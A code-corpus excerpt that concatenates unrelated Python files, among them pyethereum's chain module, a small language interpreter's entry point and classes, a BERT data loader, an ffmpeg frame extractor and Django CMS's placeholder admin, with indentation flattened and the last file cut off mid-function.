def setup(bot):
if not hasattr(bot, 'servercfg'):
default = {
"servers": {}, "serverspath": "NONE", "backupspath": "NONE", "oldTimer": 1440
}
bot.servercfg = Config(f'{bot.dir}/configs/serverCfgs.toml',
default=default,
load=True, loop=bot.loop)
bot.register_nodes([f'{__name__}.watchdog'])
bot.add_cog(Watchdog(bot))
``` |
{
"source": "JinKin/pyethereum",
"score": 2
} |
#### File: ethereum/pow/chain.py
```python
from __future__ import print_function
from builtins import range
import json
import random
import time
import itertools
from ethereum import utils
from ethereum.utils import parse_as_bin, big_endian_to_int, is_string
from ethereum.meta import apply_block
from ethereum.common import update_block_env_variables
from ethereum.messages import apply_transaction
import rlp
from rlp.utils import encode_hex
from ethereum.exceptions import InvalidNonce, InsufficientStartGas, UnsignedTransaction, \
BlockGasLimitReached, InsufficientBalance, InvalidTransaction, VerificationFailed
from ethereum.slogging import get_logger, configure_logging
from ethereum.config import Env
from ethereum.state import State, dict_to_prev_header
from ethereum.block import Block, BlockHeader, BLANK_UNCLES_HASH, FakeHeader
from ethereum.pow.consensus import initialize
from ethereum.genesis_helpers import mk_basic_state, state_from_genesis_declaration, \
initialize_genesis_keys
from ethereum.db import RefcountDB
log = get_logger('eth.chain')
config_string = ':info' #,eth.chain:debug'
#config_string = ':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug'
configure_logging(config_string=config_string)
class Chain(object):
def __init__(self, genesis=None, env=None,
new_head_cb=None, reset_genesis=False, localtime=None, max_history=1000, **kwargs):
self.env = env or Env()
# Initialize the state
if b'head_hash' in self.db: # new head tag
self.state = self.mk_poststate_of_blockhash(
self.db.get('head_hash'))
self.state.executing_on_head = True
print('Initializing chain from saved head, #%d (%s)' %
(self.state.prev_headers[0].number, encode_hex(self.state.prev_headers[0].hash)))
elif genesis is None:
raise Exception("Need genesis decl!")
elif isinstance(genesis, State):
assert env is None
self.state = genesis
self.env = self.state.env
print('Initializing chain from provided state')
reset_genesis = True
elif "extraData" in genesis:
self.state = state_from_genesis_declaration(
genesis, self.env, executing_on_head=True)
reset_genesis = True
print('Initializing chain from provided genesis declaration')
elif "prev_headers" in genesis:
self.state = State.from_snapshot(
genesis, self.env, executing_on_head=True)
reset_genesis = True
print('Initializing chain from provided state snapshot, %d (%s)' %
(self.state.block_number, encode_hex(self.state.prev_headers[0].hash[:8])))
elif isinstance(genesis, dict):
print('Initializing chain from new state based on alloc')
self.state = mk_basic_state(genesis, {
"number": kwargs.get('number', 0),
"gas_limit": kwargs.get('gas_limit', self.env.config['BLOCK_GAS_LIMIT']),
"gas_used": kwargs.get('gas_used', 0),
"timestamp": kwargs.get('timestamp', 1467446877),
"difficulty": kwargs.get('difficulty', 2**25),
"hash": kwargs.get('prevhash', '00' * 32),
"uncles_hash": kwargs.get('uncles_hash', '0x' + encode_hex(BLANK_UNCLES_HASH))
}, self.env)
reset_genesis = True
assert self.env.db == self.state.db
initialize(self.state)
self.new_head_cb = new_head_cb
if self.state.block_number == 0:
assert self.state.block_number == self.state.prev_headers[0].number
else:
assert self.state.block_number - 1 == self.state.prev_headers[0].number
if reset_genesis:
if isinstance(self.state.prev_headers[0], FakeHeader):
header = self.state.prev_headers[0].to_block_header()
else:
header = self.state.prev_headers[0]
self.genesis = Block(header)
self.state.prev_headers[0] = header
initialize_genesis_keys(self.state, self.genesis)
else:
self.genesis = self.get_block_by_number(0)
self.head_hash = self.state.prev_headers[0].hash
self.time_queue = []
self.parent_queue = {}
self.localtime = time.time() if localtime is None else localtime
self.max_history = max_history
# Head (tip) of the chain
@property
def head(self):
try:
block_rlp = self.db.get(self.head_hash)
if block_rlp == b'GENESIS':
return self.genesis
else:
return rlp.decode(block_rlp, Block)
except Exception as e:
log.error(e)
return None
# Returns the post-state of the block
def mk_poststate_of_blockhash(self, blockhash):
if blockhash not in self.db:
raise Exception("Block hash %s not found" % encode_hex(blockhash))
block_rlp = self.db.get(blockhash)
if block_rlp == b'GENESIS':
return State.from_snapshot(json.loads(
self.db.get(b'GENESIS_STATE')), self.env)
block = rlp.decode(block_rlp, Block)
state = State(env=self.env)
state.trie.root_hash = block.header.state_root
update_block_env_variables(state, block)
state.gas_used = block.header.gas_used
state.txindex = len(block.transactions)
state.recent_uncles = {}
state.prev_headers = []
b = block
header_depth = state.config['PREV_HEADER_DEPTH']
for i in range(header_depth + 1):
state.prev_headers.append(b.header)
if i < 6:
state.recent_uncles[state.block_number - i] = []
for u in b.uncles:
state.recent_uncles[state.block_number - i].append(u.hash)
try:
b = rlp.decode(state.db.get(b.header.prevhash), Block)
except BaseException:
break
if i < header_depth:
if state.db.get(b.header.prevhash) == b'GENESIS':
jsondata = json.loads(state.db.get(b'GENESIS_STATE'))
for h in jsondata["prev_headers"][:header_depth - i]:
state.prev_headers.append(dict_to_prev_header(h))
for blknum, uncles in jsondata["recent_uncles"].items():
if int(blknum) >= state.block_number - \
int(state.config['MAX_UNCLE_DEPTH']):
state.recent_uncles[blknum] = [
parse_as_bin(u) for u in uncles]
else:
raise Exception("Dangling prevhash")
assert len(state.journal) == 0, state.journal
return state
# Gets the parent block of a given block
def get_parent(self, block):
if block.header.number == int(self.db.get(b'GENESIS_NUMBER')):
return None
return self.get_block(block.header.prevhash)
# Gets the block with a given blockhash
def get_block(self, blockhash):
try:
block_rlp = self.db.get(blockhash)
if block_rlp == b'GENESIS':
if not hasattr(self, 'genesis'):
self.genesis = rlp.decode(
self.db.get(b'GENESIS_RLP'), sedes=Block)
return self.genesis
else:
return rlp.decode(block_rlp, Block)
except Exception as e:
log.debug("Failed to get block", hash=blockhash, error=e)
return None
# Add a record allowing you to later look up the provided block's
# parent hash and see that it is one of its children
def add_child(self, child):
try:
existing = self.db.get(b'child:' + child.header.prevhash)
except BaseException:
existing = b''
existing_hashes = []
for i in range(0, len(existing), 32):
existing_hashes.append(existing[i: i + 32])
if child.header.hash not in existing_hashes:
self.db.put(
b'child:' + child.header.prevhash,
existing + child.header.hash)
# Gets the hash of the block with the given block number
def get_blockhash_by_number(self, number):
try:
return self.db.get(b'block:%d' % number)
except BaseException:
return None
# Gets the block with the given block number
def get_block_by_number(self, number):
return self.get_block(self.get_blockhash_by_number(number))
# Get the hashes of all known children of a given block
def get_child_hashes(self, blockhash):
o = []
try:
data = self.db.get(b'child:' + blockhash)
for i in range(0, len(data), 32):
o.append(data[i:i + 32])
return o
except BaseException:
return []
# Get the children of a block
def get_children(self, block):
if isinstance(block, Block):
block = block.header.hash
if isinstance(block, BlockHeader):
block = block.hash
return [self.get_block(h) for h in self.get_child_hashes(block)]
# Get the score (AKA total difficulty in PoW) of a given block
def get_score(self, block):
if not block:
return 0
key = b'score:' + block.header.hash
fills = []
while key not in self.db:
fills.insert(0, (block.header.hash, block.difficulty))
key = b'score:' + block.header.prevhash
block = self.get_parent(block)
score = int(self.db.get(key))
for h, d in fills:
key = b'score:' + h
score = score + d + random.randrange(d // 10**6 + 1)
self.db.put(key, str(score))
return score
# This function should be called periodically so as to
# process blocks that were received but laid aside because
# they were received too early
def process_time_queue(self, new_time=None):
self.localtime = time.time() if new_time is None else new_time
i = 0
while i < len(
self.time_queue) and self.time_queue[i].timestamp <= self.localtime:
log.info('Adding scheduled block')
pre_len = len(self.time_queue)
self.add_block(self.time_queue.pop(i))
if len(self.time_queue) == pre_len:
i += 1
# Call upon receiving a block
def add_block(self, block):
now = self.localtime
# Are we receiving the block too early?
if block.header.timestamp > now:
i = 0
while i < len(
self.time_queue) and block.timestamp > self.time_queue[i].timestamp:
i += 1
self.time_queue.insert(i, block)
log.info('Block received too early (%d vs %d). Delaying for %d seconds' %
(now, block.header.timestamp, block.header.timestamp - now))
return False
# Is the block being added to the head?
if block.header.prevhash == self.head_hash:
log.info('Adding to head',
head=encode_hex(block.header.prevhash[:4]))
self.state.deletes = []
self.state.changed = {}
try:
apply_block(self.state, block)
except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
log.info('Block %d (%s) with parent %s invalid, reason: %s' %
(block.number, encode_hex(block.header.hash[:4]), encode_hex(block.header.prevhash[:4]), str(e)))
return False
self.db.put(b'block:%d' % block.header.number, block.header.hash)
# side effect: put 'score:' cache in db
block_score = self.get_score(block)
self.head_hash = block.header.hash
for i, tx in enumerate(block.transactions):
self.db.put(b'txindex:' +
tx.hash, rlp.encode([block.number, i]))
assert self.get_blockhash_by_number(
block.header.number) == block.header.hash
deletes = self.state.deletes
changed = self.state.changed
# Or is the block being added to a chain that is not currently the
# head?
elif block.header.prevhash in self.env.db:
log.info('Receiving block %d (%s) not on head (%s), adding to secondary post state %s' %
(block.number, encode_hex(block.header.hash[:4]),
encode_hex(self.head_hash[:4]), encode_hex(block.header.prevhash[:4])))
temp_state = self.mk_poststate_of_blockhash(block.header.prevhash)
try:
apply_block(temp_state, block)
except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
log.info('Block %s with parent %s invalid, reason: %s' %
(encode_hex(block.header.hash[:4]), encode_hex(block.header.prevhash[:4]), str(e)))
return False
deletes = temp_state.deletes
block_score = self.get_score(block)
changed = temp_state.changed
# If the block should be the new head, replace the head
if block_score > self.get_score(self.head):
b = block
new_chain = {}
# Find common ancestor
while b.header.number >= int(self.db.get(b'GENESIS_NUMBER')):
new_chain[b.header.number] = b
key = b'block:%d' % b.header.number
orig_at_height = self.db.get(
key) if key in self.db else None
if orig_at_height == b.header.hash:
break
if b.prevhash not in self.db or self.db.get(
b.prevhash) == b'GENESIS':
break
b = self.get_parent(b)
replace_from = b.header.number
# Replace block index and tx indices, and edit the state cache
# Get a list of all accounts that have been edited along the old and
# new chains
changed_accts = {}
# Read: for i in range(common ancestor block number...new block
# number)
for i in itertools.count(replace_from):
log.info('Rewriting height %d' % i)
key = b'block:%d' % i
# Delete data for old blocks
orig_at_height = self.db.get(
key) if key in self.db else None
if orig_at_height:
orig_block_at_height = self.get_block(orig_at_height)
log.info(
'%s no longer in main chain' %
encode_hex(
orig_block_at_height.header.hash))
# Delete from block index
self.db.delete(key)
# Delete from txindex
for tx in orig_block_at_height.transactions:
if b'txindex:' + tx.hash in self.db:
self.db.delete(b'txindex:' + tx.hash)
# Add to changed list
acct_list = self.db.get(
b'changed:' + orig_block_at_height.hash)
for j in range(0, len(acct_list), 20):
changed_accts[acct_list[j: j + 20]] = True
# Add data for new blocks
if i in new_chain:
new_block_at_height = new_chain[i]
log.info(
'%s now in main chain' %
encode_hex(
new_block_at_height.header.hash))
# Add to block index
self.db.put(key, new_block_at_height.header.hash)
# Add to txindex
for j, tx in enumerate(
new_block_at_height.transactions):
self.db.put(b'txindex:' + tx.hash,
rlp.encode([new_block_at_height.number, j]))
# Add to changed list
if i < b.number:
acct_list = self.db.get(
b'changed:' + new_block_at_height.hash)
for j in range(0, len(acct_list), 20):
changed_accts[acct_list[j: j + 20]] = True
if i not in new_chain and not orig_at_height:
break
# Add changed list from new head to changed list
for c in changed.keys():
changed_accts[c] = True
# Update the on-disk state cache
for addr in changed_accts.keys():
data = temp_state.trie.get(addr)
if data:
self.state.db.put(b'address:' + addr, data)
else:
try:
self.state.db.delete(b'address:' + addr)
except KeyError:
pass
self.head_hash = block.header.hash
self.state = temp_state
self.state.executing_on_head = True
# Block has no parent yet
else:
if block.header.prevhash not in self.parent_queue:
self.parent_queue[block.header.prevhash] = []
self.parent_queue[block.header.prevhash].append(block)
log.info('Got block %d (%s) with prevhash %s, parent not found. Delaying for now' %
(block.number, encode_hex(block.hash[:4]), encode_hex(block.prevhash[:4])))
return False
self.add_child(block)
self.db.put(b'head_hash', self.head_hash)
self.db.put(block.hash, rlp.encode(block))
self.db.put(b'changed:' + block.hash,
b''.join([k.encode() if not is_string(k) else k for k in list(changed.keys())]))
print('Saved %d address change logs' % len(changed.keys()))
self.db.put(b'deletes:' + block.hash, b''.join(deletes))
log.debug('Saved %d trie node deletes for block %d (%s)' %
(len(deletes), block.number, utils.encode_hex(block.hash)))
# Delete old junk data
old_block_hash = self.get_blockhash_by_number(
block.number - self.max_history)
if old_block_hash:
try:
deletes = self.db.get(b'deletes:' + old_block_hash)
log.debug(
'Deleting up to %d trie nodes' %
(len(deletes) // 32))
rdb = RefcountDB(self.db)
for i in range(0, len(deletes), 32):
rdb.delete(deletes[i: i + 32])
self.db.delete(b'deletes:' + old_block_hash)
self.db.delete(b'changed:' + old_block_hash)
except KeyError as e:
print(e)
pass
self.db.commit()
assert (b'deletes:' + block.hash) in self.db
log.info('Added block %d (%s) with %d txs and %d gas' %
(block.header.number, encode_hex(block.header.hash)[:8],
len(block.transactions), block.header.gas_used))
# Call optional callback
if self.new_head_cb and block.header.number != 0:
self.new_head_cb(block)
# Are there blocks that we received that were waiting for this block?
# If so, process them.
if block.header.hash in self.parent_queue:
for _blk in self.parent_queue[block.header.hash]:
self.add_block(_blk)
del self.parent_queue[block.header.hash]
return True
def __contains__(self, blk):
if isinstance(blk, (str, bytes)):
try:
blk = rlp.decode(self.db.get(blk), Block)
except BaseException:
return False
try:
o = self.get_block(self.get_blockhash_by_number(blk.number)).hash
assert o == blk.hash
return True
except Exception as e:
return False
def has_block(self, block):
return block in self
def has_blockhash(self, blockhash):
return blockhash in self.db
def get_chain(self, frm=None, to=2**63 - 1):
if frm is None:
frm = int(self.db.get(b'GENESIS_NUMBER')) + 1
chain = []
for i in itertools.islice(itertools.count(), frm, to):
h = self.get_blockhash_by_number(i)
if not h:
return chain
chain.append(self.get_block(h))
# Get block number and transaction index
def get_tx_position(self, tx):
if not isinstance(tx, (str, bytes)):
tx = tx.hash
if b'txindex:' + tx in self.db:
data = rlp.decode(self.db.get(b'txindex:' + tx))
return big_endian_to_int(data[0]), big_endian_to_int(data[1])
else:
return None
def get_transaction(self, tx):
print('Deprecated. Use get_tx_position')
blknum, index = self.get_tx_position(tx)
blk = self.get_block_by_number(blknum)
return blk.transactions[index], blk, index
# Get descendants of a block
def get_descendants(self, block):
output = []
blocks = [block]
while len(blocks):
b = blocks.pop()
blocks.extend(self.get_children(b))
output.append(b)
return output
@property
def db(self):
return self.env.db
# Get blockhashes starting from a hash and going backwards
def get_blockhashes_from_hash(self, blockhash, max_num):
block = self.get_block(blockhash)
if block is None:
return []
header = block.header
hashes = []
for i in range(max_num):
block = self.get_block(header.prevhash)
if block is None:
break
header = block.header
hashes.append(header.hash)
if header.number == 0:
break
return hashes
@property
def config(self):
return self.env.config
``` |
{
"source": "jink-lang/jink",
"score": 3
} |
#### File: jink-lang/jink/jink.py
```python
import sys, argparse
from jink import optimizer
from jink.lexer import Lexer
from jink.parser import Parser
from jink.optimizer import optimize
from jink.interpreter import Interpreter, Environment
from jink.repl import REPL
# from jink.compiler import Compiler
def get_code_from_path(path):
if not path.endswith('.jk'):
path += '.jk'
code = open(path).read()
if not code:
raise Exception(f"Error reading file {sys.argv[0]}")
return code
if len(sys.argv) >= 1 and sys.argv[0] == 'jink.py':
sys.argv.pop(0)
verbose = False
to_compile = False
if '-v' in sys.argv:
sys.argv.remove('-v')
verbose = True
if '-c' in sys.argv:
sys.argv.remove('-c')
# Launch REPL
if len(sys.argv) == 0 or (len(sys.argv) == 1 and sys.argv[0] == '-v'):
print("jink REPL - use '[jink] help' for help - type 'exit' to exit.")
repl = REPL(sys.stdin, sys.stdout, verbose=verbose)
repl.main_loop()
elif len(sys.argv) >= 1:
if sys.argv[0] == 'help':
print('\n'.join([
"jink - strongly typed, JavaScript-like programming language.",
"https://www.github.com/jink-lang/jink",
"",
"args:",
" > -v -- verbose; will output AST." # and if compiling, both optimized and unoptimized LLVM IR.",
# " > -c -- compile; will use compiler instead of interpreter."
"",
"usage:",
" > [jink] help -- shows this prompt.",
" > [jink] path/to/file[.jk] -- executes interpreter on file.",
" > [jink] -v path/to/file[.jk] -- executes interpreter on file verbose mode.",
# " > [jink] -c path/to/file[.jk] -- executes compiler on file.",
# " > [jink] -c -v path/to/file[.jk] -- executes compiler on file in verbose mode.",
" > [jink] -- launches interpreted interactive REPL.",
" > [jink] -v -- launches interpreted interactive REPL in verbose mode."
]))
else:
path = ' '.join(sys.argv)
code = get_code_from_path(path)
if to_compile:
raise NotImplementedError("Compiler not yet implemented.")
# Compiler()._eval(code, optimize=True, verbose=verbose)
else:
AST = optimize(Parser().parse(Lexer().parse(code), verbose=verbose))
env = Environment()
env.add_builtins()
Interpreter().evaluate(AST, env)
if __name__ == "__main__":
pass
```
#### File: jink/utils/classes.py
```python
from jink.utils.evals import *
from enum import Enum
class TokenType(Enum):
EOF = 0
NEWLINE = 1
KEYWORD = 2
IDENTIFIER = 3
NUMBER = 4
STRING = 5
OPERATOR = 6
LPAREN = 7
RPAREN = 8
LBRACKET = 9
RBRACKET = 10
LBRACE = 11
RBRACE = 12
SEMICOLON = 13
COLON = 14
COMMA = 15
class Token:
def __init__(self, _type, value, line, pos):
self.type, self.value, self.line, self.pos = _type, value, line, pos
def __str__(self):
return f"{{ 'type': 'Token<{self.type}>', 'contents': {{ 'value': '{self.value}', 'line': {self.line}, 'pos': {self.pos} }} }}"
def smallStr(self):
return f"{{{self.type} {self.value}}}"
__repr__ = __str__
class BinaryOperator:
__slots__ = ('operator', 'left', 'right')
def __init__(self, operator, left, right):
self.operator, self.left, self.right = operator, left, right
class UnaryOperator:
__slots__ = ('operator', 'value')
def __init__(self, operator, value):
self.operator, self.value = operator, value
class IntegerLiteral:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class FloatingPointLiteral:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class StringLiteral:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class BooleanLiteral:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class IdentLiteral:
def __init__(self, name, index={ 'type': None, 'index': None }):
self.name, self.index = name, index
class Null:
def __init__(self, value):
self.value = "null"
class Assignment:
__slots__ = ('type', 'ident', 'value')
def __init__(self, _type, ident, value):
self.type, self.ident, self.value = _type, ident, value
class CallExpression:
__slots__ = ('name', 'args')
def __init__(self, name, args):
self.name, self.args = name, args
class Function:
__slots__ = ('name', 'params', 'body')
def __init__(self, name, params, body):
self.name, self.params, self.body = name, params, body
class FunctionParameter:
__slots__ = ('name', 'type', 'default')
def __init__(self, name, _type, default=None):
self.name, self.type, self.default = name, _type, default
class Return:
__slots__ = ('value')
def __init__(self, value):
self.value = value
class Conditional:
__slots__ = ('type', 'expression', 'body', 'else_body')
def __init__(self, _type, expression, body, else_body):
self.type, self.expression, self.body, self.else_body = _type, expression, body, else_body
class Module:
__slots__ = ('name', 'index')
def __init__(self, name, index):
self.name, self.index = name, index
``` |
{
"source": "jinkookchoi/bert-classifier",
"score": 3
} |
#### File: bert-classifier/single_label/data_loader.py
```python
import torch
from torch.utils.data import Dataset
from torchtext import data
# DataLoader class
# TokenizerWrapper class
class TokenizerWrapper():
def __init__(self, tokenizer, max_length):
self.tokenizer = tokenizer
self.max_length = max_length
def collate(self, samples):
texts = [s['text'] for s in samples]
labels = [s['label'] for s in samples]
encoding = self.tokenizer(
texts,
padding=True,
truncation=True,
return_tensors='pt',
max_length=self.max_length
)
return {
'text': texts,
'input_ids': encoding['input_ids'],
'attention_mask': encoding['attention_mask'],
'labels': torch.tensor(labels, dtype=torch.long)
}
class BertDataset(Dataset):
def __init__(self, texts, labels):
self.texts = texts
self.labels = labels
def __len__(self):
return len(self.texts)
def __getitem__(self, item):
text = str(self.texts[item])
label = self.labels[item]
return {
'text': text,
'label': label,
}
``` |
{
"source": "Jinksi/SelFlow",
"score": 3
} |
#### File: Jinksi/SelFlow/extract_video_frames.py
```python
import os
import argparse
import math
import json
import time
import sys
import subprocess
def printJson(data):
print(json.dumps(data))
sys.stdout.flush()
time.sleep(0.1)
def extract_video_frames(input, output_dir, fps):
input_filename = os.path.splitext(os.path.basename(input))[0]
if output_dir:
os.makedirs(output_dir, exist_ok=True)
subprocess.run(
[
"ffmpeg",
"-hide_banner",
"-i",
input,
"-vf",
f"fps={fps}",
"-qscale:v",
"2",
os.path.join(output_dir, f"{input_filename}_{fps}fps_%06d.jpg"),
]
)
print("==================")
print(
"Video frames extracted to",
os.path.join(output_dir, f"{input_filename}_{fps}fps_%06d.jpg"),
)
print("==================")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Extract video frames from a video")
parser.add_argument("--input", default="./videos/video_test.mov/", required=True)
parser.add_argument("--output_dir", default="./output/video_frames/", required=True)
parser.add_argument("--fps", default=25, type=int)
args = parser.parse_args()
extract_video_frames(args.input, args.output_dir, args.fps)
# python extract_video_frames.py --input=videos/video_test.mov --output_dir=output/video_frames --fps=25
``` |
{
"source": "jinksunk/InfosecDatasetCreationTools",
"score": 3
} |
#### File: evtgen/datasources/datasourceinterface.py
```python
import uuid
import logging
import sys
class DataGenerator(object):
'''
Represents a general generator of data instances.
It is intended that the __init__ constructors will take in the required
parameter information
'''
mylog = logging.getLogger(__name__)
class DataStore(object):
'''
Represents a general generator of data instances.
It is intended that the __init__ constructors will take in the required
parameter information
'''
mylog = logging.getLogger(__name__)
def __init__(self):
'''
Interface Constructor
'''
self.event_list = list()
self.data_list = list()
def add_event(self, event):
'''
Interface Definition - will add the event to the set of events from which data will be
stored.
'''
self.mylog.debug("Adding event {} to event_list".format( event.get_id()))
self.event_list.append(event)
self.mylog.debug("Now contains {} data elements (timestamps: {} )".format(
len(self.get_datalist()),
",".join(x.get_time() for x in self.get_datalist())))
def get_events(self):
'''
Return a list of events stored in this data store:
'''
return self.event_list
def length(self):
'''
Return the number of events that will be written with this data generator
'''
return len(self.event_list)
def write(self, target):
'''
Interface Definition - will store the generated data instances appropriately to the datasource type;
e.g. pcaps generated will be written to files. The 'target' argument is the specifier for where
the data should be written to.
'''
self.mylog.error("Interface unimplemented. Use a subclass instead.")
sys.exit(1)
def get_datalist(self):
'''
Return the list of data instances added to the store. Data instances are subclassed from DataElement.
'''
dilist = list()
self.mylog.debug("Datasource {} contains {} events".format(self.supported_source, len(self.event_list)))
for ev in self.event_list:
dtmp = ev.get_datainstances(self.supported_source)
self.mylog.debug("Adding {} data instances for event {}".format(
len(dtmp), ev.get_id()))
if len(dtmp) > 0:
dilist.extend(dtmp)
return dilist
class DataElement(object):
'''
An abstracted data element which can be used with DataGenerators in a generic way
'''
mylog = logging.getLogger(__name__)
def __init__(self, timestamp, eventid, rawdataelement):
'''
Initialize the data element with a timestamp, associated event identifier, and unique ID
'''
self.elementid = self._generate_id()
self.timestamp = timestamp
self.eventid = eventid
self.rawelement = rawdataelement
def get_timestamp(self):
'''
Return the timestamp for this data element
'''
return self.timestamp
def get_uniqid(self):
'''
Return the unique GUID for this data element
'''
return self.uniqid
def get_raw_element(self):
'''
Get the encapsulated data element.
'''
return self.rawelement
def _generate_id(self):
'''
This base method simply generates a type-4 UUID. If a different type of ID is desired, this can
be overridden
'''
self.uniqid = uuid.uuid4()
class LabelFile(object):
'''
An abstract class representing a label file in KIDS - each data source should have a corresponding
LabelFile implementation that records the unique IDs of each event and the data instances in
the data source that correspond to that event.
'''
mylog = logging.getLogger(__name__)
def __init__(self, datasource):
'''
Initialize with a reference to the data source we are a label for.
'''
self.datasource = datasource
``` |
{
"source": "jinktv/django-cms",
"score": 2
} |
#### File: cms/admin/placeholderadmin.py
```python
from cms.forms.fields import PlaceholderFormField
from cms.models.fields import PlaceholderField
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.plugin_pool import plugin_pool
from cms.utils import get_language_from_request, cms_static_url, get_cms_setting
from cms.utils.permissions import has_plugin_permission
from copy import deepcopy
from django.conf import settings
from django.contrib.admin import ModelAdmin
from django.http import (HttpResponse, Http404, HttpResponseBadRequest,
HttpResponseForbidden)
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.template.defaultfilters import force_escape, escapejs
from django.utils.translation import ugettext as _
from cms.templatetags.cms_admin import admin_static_url
class PlaceholderAdmin(ModelAdmin):
class Media:
css = {
'all': [cms_static_url(path) for path in (
'css/rte.css',
'css/pages.css',
'css/change_form.css',
'css/jquery.dialog.css',
'css/plugin_editor.css',
)]
}
js = [cms_static_url(path) for path in [
'js/plugins/admincompat.js',
'js/csrf.js',
'js/libs/jquery.query.js',
'js/libs/jquery.ui.core.js',
'js/libs/jquery.ui.dialog.js',
]
]
def get_fieldsets(self, request, obj=None):
"""
Get fieldsets to enforce correct fieldsetting of placeholder fields
"""
form = self.get_form(request, obj)
placeholder_fields = self._get_placeholder_fields(form)
if self.declared_fieldsets:
# check those declared fieldsets
fieldsets = list(deepcopy(self.declared_fieldsets))
for label, fieldset in fieldsets:
fields = list(fieldset['fields'])
for field in fieldset['fields']:
if field in placeholder_fields:
if (len(fieldset['fields']) == 1 and
'classes' in fieldset and
'plugin-holder' in fieldset['classes'] and
'plugin-holder-nopage' in fieldset['classes']):
placeholder_fields.remove(field)
else:
fields.remove(field)
if fields:
fieldset['fields'] = fields
else:
# no fields in the fieldset anymore, delete the fieldset
fieldsets.remove((label, fieldset))
for placeholder in placeholder_fields:
fieldsets.append((self.get_label_for_placeholder(placeholder), {
'fields': (placeholder,),
'classes': ('plugin-holder', 'plugin-holder-nopage',),
},))
return fieldsets
fieldsets = []
fieldsets.append((None, {'fields': [f for f in form.base_fields.keys() if not f in placeholder_fields]}))
for placeholder in placeholder_fields:
fieldsets.append((self.get_label_for_placeholder(placeholder), {
'fields': (placeholder,),
'classes': ('plugin-holder', 'plugin-holder-nopage',),
}))
readonly_fields = self.get_readonly_fields(request, obj)
if readonly_fields:
fieldsets.append((None, {'fields': list(readonly_fields)}))
return fieldsets
def get_label_for_placeholder(self, placeholder):
return ' '.join([x.capitalize() for x in self.model._meta.get_field_by_name(placeholder)[0].verbose_name.split(' ')])
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Hook for specifying the form Field instance for a given database Field
instance.
If kwargs are given, they're passed to the form Field's constructor.
"""
if isinstance(db_field, PlaceholderField):
request = kwargs.pop("request", None)
return db_field.formfield_for_admin(request, self.placeholder_plugin_filter, **kwargs)
return super(PlaceholderAdmin, self).formfield_for_dbfield(db_field, **kwargs)
def placeholder_plugin_filter(self, request, queryset):
return queryset
def _get_placeholder_fields(self, form):
placeholder_fields = []
for key, value in form.base_fields.items():
if isinstance(value, PlaceholderFormField):
placeholder_fields.append(key)
return placeholder_fields
def get_urls(self):
"""
Register the plugin specific urls (add/edit/copy/remove/move)
"""
from django.conf.urls.defaults import patterns, url
info = "%s_%s" % (self.model._meta.app_label, self.model._meta.module_name)
pat = lambda regex, fn: url(regex, self.admin_site.admin_view(fn), name='%s_%s' % (info, fn.__name__))
url_patterns = patterns('',
pat(r'add-plugin/$', self.add_plugin),
pat(r'edit-plugin/([0-9]+)/$', self.edit_plugin),
pat(r'remove-plugin/$', self.remove_plugin),
pat(r'move-plugin/$', self.move_plugin),
pat(r'copy-plugins/$', self.copy_plugins),
)
return url_patterns + super(PlaceholderAdmin, self).get_urls()
def add_plugin(self, request):
# only allow POST
if request.method != "POST":
raise Http404
plugin_type = request.POST['plugin_type']
if not has_plugin_permission(request.user, plugin_type, "add"):
return HttpResponseForbidden("You don't have permission to add plugins")
placeholder_id = request.POST.get('placeholder', None)
position = None
language = get_language_from_request(request)
parent = None
# check if we got a placeholder (id)
if placeholder_id:
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
else: # else get the parent_id
parent_id = request.POST.get('parent_id', None)
if not parent_id: # if we get neither a placeholder nor a parent, bail out
raise Http404
parent = get_object_or_404(CMSPlugin, pk=parent_id)
placeholder = parent.placeholder
# check add permissions on placeholder
if not placeholder.has_add_permission(request):
return HttpResponseForbidden(_("You don't have permission to add content here."))
# check the limits defined in CMS_PLACEHOLDER_CONF for this placeholder
limits = get_cms_setting('PLACEHOLDER_CONF').get(placeholder.slot, {}).get('limits', None)
if limits:
count = placeholder.cmsplugin_set.count()
global_limit = limits.get("global", None)
type_limit = limits.get(plugin_type, None)
# check the global limit first
if global_limit and count >= global_limit:
return HttpResponseBadRequest(
"This placeholder already has the maximum number of plugins."
)
elif type_limit: # then check the type specific limit
type_count = CMSPlugin.objects.filter(
language=language, placeholder=placeholder, plugin_type=plugin_type
).count()
if type_count >= type_limit:
return HttpResponseBadRequest(
"This placeholder already has the maximum number (%s) "
"of %s plugins." % (type_limit, plugin_type)
)
# actually add the plugin
plugin = CMSPlugin(language=language, plugin_type=plugin_type,
position=position, placeholder=placeholder, parent=parent)
plugin.save()
# returns it's ID as response
return HttpResponse(str(plugin.pk))
def edit_plugin(self, request, plugin_id):
plugin_id = int(plugin_id)
# get the plugin to edit of bail out
cms_plugin = get_object_or_404(CMSPlugin, pk=plugin_id)
if not has_plugin_permission(request.user, cms_plugin.plugin_type, "change"):
return HttpResponseForbidden(_("You don't have permission to add plugins"))
# check that the user has permission to change this plugin
if not cms_plugin.placeholder.has_change_permission(request):
return HttpResponseForbidden(_("You don't have permission to add content here."))
instance, plugin_admin = cms_plugin.get_plugin_instance(self.admin_site)
plugin_admin.cms_plugin_instance = cms_plugin
plugin_admin.placeholder = cms_plugin.placeholder
if request.method == "POST":
# set the continue flag, otherwise will plugin_admin make redirect to list
# view, which actually does'nt exists
post_request = request.POST.copy()
post_request['_continue'] = True
request.POST = post_request
if request.POST.get("_cancel", False):
# cancel button was clicked
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'plugin': cms_plugin,
'is_popup': True,
'name': unicode(cms_plugin),
"type": cms_plugin.get_plugin_name(),
'plugin_id': plugin_id,
'icon': force_escape(escapejs(cms_plugin.get_instance_icon_src())),
'alt': force_escape(escapejs(cms_plugin.get_instance_icon_alt())),
'cancel': True,
}
instance = cms_plugin.get_plugin_instance()[0]
if not instance:
